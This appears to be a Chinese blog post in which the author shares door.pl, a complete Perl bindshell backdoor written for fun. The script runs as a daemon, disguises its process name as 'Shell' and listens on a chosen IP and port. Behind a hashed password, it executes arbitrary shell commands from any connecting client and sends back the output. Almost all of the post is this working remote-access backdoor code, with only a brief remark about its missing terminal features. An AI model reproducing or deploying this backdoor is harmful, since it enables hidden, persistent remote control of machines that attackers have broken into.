闲来无事，写了一个超级简单的bindshell，客户端可以连接上去，可以当作最简单的shell使用，
   door.pl以守护进程方式启动，，代码简单如下：
       #!/usr/bin/perl -w
use strict;
use Getopt::Std;
use IO::Socket;
use POSIX;
my $PASS="ak7JGs5/E5JCQ";
my $PORT=undef;
my $IP=undef;
my $socket=undef;
my $PROC="Shell";
$0=$PROC;
 
sub main
{
        &check_args;
        &daemon;
        &make_sock;
        &accept;
}

sub check_args
{
 my %args=();
 getopts("i:p:",\%args);
 if(defined $args{'i'} and defined $args{'p'}){
  $IP=$args{'i'};
  $PORT=$args{'p'};
  return 1;
 }else{
  my $info="Usage:$0 -i ipaddress -p port\nbind the Ip and listen on the Port ,waiting for client connect.\n\n this programe need two arguments,and the aguments means:\n\n -i \t\t\t\tThe ipaddress to bind\n -p \t\t\t\tListen port\ncurrent version is 1.01\nReport bugs to <027xiatian\@163.com>.\n";
  print $info;
  exit;
 }
}

sub daemon
{
 my $daemon=fork();
 exit 0 if($daemon);
        open( STDOUT, ">/dev/null" );
 open( STDIN, "</dev/null");
        open( STDERR, ">&STDOUT" );
 setsid();
 chdir("/root");
 umask 0;
 $ENV{PATH} = "/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin";
}
sub make_sock
{
 $socket=IO::Socket::INET->new(
  LocalHost=>$IP,
  LocalPort=>$PORT,
  Listen=>100,
  Rescue=>1,
  TimeOut=>15) or do {warn "make socket err\n";exit;};
}
sub accept
{
 while(1){
  while(defined(my $connect=$socket->accept())){
   
   $connect->flush();
   my $pid=fork();
   if($pid){
    $SIG{CHLD}=sub {while((my $child=waitpid(-1,WNOHANG))>0) {}};
   }else{
    &Pass_check($connect);
    &ExecuteShell($connect);
   }
  }

        }
} 
sub Pass_check
{
 my $sock=shift;
 my $banner="\n\tWelecome to use bindshell v.10 by summer \r\n\nPassword:";
 print $sock $banner;
 while(defined(my $info=<$sock>)){
  $info=~ s/\r//g;
  $info=~ s/\n//g;
  if(crypt($info,$PASS) eq $PASS){
   print $sock("\r\n#");
   return 1;
  }else{
   print $sock("\r\n Password incorrect\r\nPassword:");
  }
 }
}
sub ExecuteShell
{
 my $con=shift;
 local $SIG{ALRM}=sub { print $con("\tcommand Timeout fail !\r\n");next;};
 while(defined(my $cmd=<$con>)){
  chomp($cmd);
  if ($cmd =~ /^exit$|^exit\r$/){
   print $con("Exiting .....\r\n");
   exit;
  }
  my @cmd=("\tcommand execute!");
  eval {
   alarm(3);
   @cmd=qx/$cmd 2>&1/;
   alarm(0);
   chomp(@cmd);
  };
    foreach my $line (@cmd){
      print $con("$line\r\n");
   }
  print $con "\r\n#";
 }
}
main()
 
很明显的问题就是没有shell和bash的终端属性，命令不能后退，敲错命令得重来，相当的拙劣，呵呵，，